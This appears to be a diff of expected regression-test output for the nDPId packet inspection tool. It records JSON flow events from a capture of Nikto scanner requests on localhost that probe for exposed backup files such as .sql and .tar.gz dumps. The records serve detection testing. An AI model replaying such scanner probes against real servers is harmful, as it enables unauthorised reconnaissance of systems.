+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276913,"pkt":"AAAAAAAAAAAAAAAACABFAADCN0tAAEAGBOl\/AAABfwAAAcLCH5DYOQ8GBjLTAIAYAED+tgAAAQEICp1m+9mdZvvZR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276916,"pkt":"AAAAAAAAAAAAAAAACABFAADCczVAAEAGyP5\/AAABfwAAAcLEH5BP20t\/\/3FheoAYAED+tgAAAQEICp1m+9ydZvvcR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_packet_id":1,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276917,"pkt":"AAAAAAAAAAAAAAAACABFAADDZ9VAAEAG1F1\/AAABfwAAAcLGH5AZz1+f4E8iK4AYAED+twAAAQEICp1m+92dZvvdR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276917,"flow_last_seen":1576420276917,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_packet_id":1,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276919,"pkt":"AAAAAAAAAAAAAAAACABFAADDxTFAAEAGdwF\/AAABfwAAAcLIH5D+g\/1jHP616oAYAED+twAAAQEICp1m+9+dZvveR0VUIC8xMjcwLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":160,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276919,"flow_last_seen":1576420276919,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_packet_id":1,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276920,"pkt":"AAAAAAAAAAAAAAAACABFAADFpeFAAEAGlk9\/AAABfwAAAcLKH5AnGp2SsuR1gYAYAED+uQAAAQEICp1m++CdZvvgR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276920,"flow_last_seen":1576420276920,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_packet_id":1,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276922,"pkt":"AAAAAAAAAAAAAAAACABFAADFIE9AAEAGG+J\/AAABfwAAAcLMH5CC7hgEsmCzLIAYAED+uQAAAQEICp1m++KdZvviR0VUIC8xMjcwLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":162,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":162,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276922,"flow_last_seen":1576420276922,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_packet_id":1,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276924,"pkt":"AAAAAAAAAAAAAAAACABFAADFRxNAAEAG9R1\/AAABfwAAAcLOH5BdCH9f1fkuqIAYAED+uQAAAQEICp1m++SdZvvjR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":163,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276924,"flow_last_seen":1576420276924,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276924,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276925,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":164,"flow_packet_id":1,"flow_last_seen":1576420276925,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276925,"pkt":"AAAAAAAAAAAAAAAACABFAADFQzdAAEAG+Pl\/AAABfwAAAcLQH5BEXHt7s07ta4AYAED+uQAAAQEICp1m++WdZvvlR0VUIC8xMjdfMF8wXzEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 